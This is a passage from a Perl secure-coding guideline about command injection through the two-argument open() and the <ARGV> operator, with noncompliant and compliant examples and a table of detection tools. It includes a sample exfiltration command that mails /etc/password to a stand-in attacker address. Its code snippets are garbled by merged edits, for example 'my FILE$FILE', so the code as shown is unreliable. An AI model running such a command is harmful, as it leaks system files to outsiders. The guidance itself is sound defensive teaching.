...
open FILEHANDLE,EXPR
open FILEHANDLE,MODE,EXPR
open FILEHANDLE,MODE,EXPR,LIST
open FILEHANDLE,MODE,REFERENCE
open FILEHANDLE
Opens the file whose filename file name is given by EXPR , and associates it with FILEHANDLE.
...
| Code Block | ||||
|---|---|---|---|---|
| ||||
my $filename = # initialize open(my FILE$FILE, $filename) or croak("file not found"); while (<FILE><$FILE>) { print "$file$filename: $_"; }; |
Although this code clearly expects its file to be opened for reading, the file name might indicate a shell command. It might also indicate a file to be written rather than read.
...
| Code Block | ||||
|---|---|---|---|---|
| ||||
my $filename = # initialize open(my FILE$FILE, "<$filename") or croak("file not found"); while (<FILE><$FILE>) { print "$file$filename: $_"; }; |
If $filename begins or ends with |, the preceding < forces it to be treated as a file name rather than a shell command.
This code will not execute a shell command. However, an attacker could cause a program to hang by supplying - as the file name. This , which is interpreted by open() as reading standard input.
...
This code suffers from the same vulnerability as the first noncompliant code example. The <ARGV> operator opens every file provided in the @ARGV array and returns a line from each file. Unfortunately, it uses the two-argument form of open() to accomplish this task. If any element of @ARGV begins or ends with |, it is interpreted as a shell command and executed.
...
| Code Block | ||||
|---|---|---|---|---|
| ||||
my $filename = # initialize open(my FILE$FILE, "<", $filename) or croak("file not found"); while (<FILE><$FILE>) { print "$file$filename: $_"; }; |
The three-argument invocations of open() are not subject to the same vulnerabilities as the two-argument open(). In this code, $filename is treated as a file name even if it contains characters that are treated specially by the two-argument open() function. For example, if $filename is specified as -, then the three-argument open() attempts to open a file named - rather than opening standard input.
...
Because any user can invoke the rt executable with environment variables he or she controls, a hostile user may set the RTCONFIG environment variable to a malicious command, such as:
| Code Block | ||
|---|---|---|
| ||
cat /etc/password | mail some@badguy.net | |
...
This code causes $file to be treated as a file name regardless of what special characters it might contain.
Note that the last line of this compliant solution still violates FIO00-PL. Do not use bareword file handles.
Risk Assessment
Failure to handle error codes or other values returned by functions can lead to incorrect program flow and violations of data integrity.
Recommendation | Severity | Likelihood | Remediation Cost | Priority | Level |
|---|---|---|---|---|---|
IDS31-PL | high | likely | low | P27 | L1 |
Automated Detection
Tool | Version | DiagnosticChecker | Description | |
|---|---|---|---|---|
Perl::Critic | 5.0 | InputOutput::ProhibitTwoArgOpen | Implemented | |
B::Lint | 5.0 | Use of <> |
| Unterminated <> operator |
| Taint mode | Insecure dependency in piped open while running with -T switch | |||
| Implemented |
Bibliography
...
...
...
...
...
...
...
...
...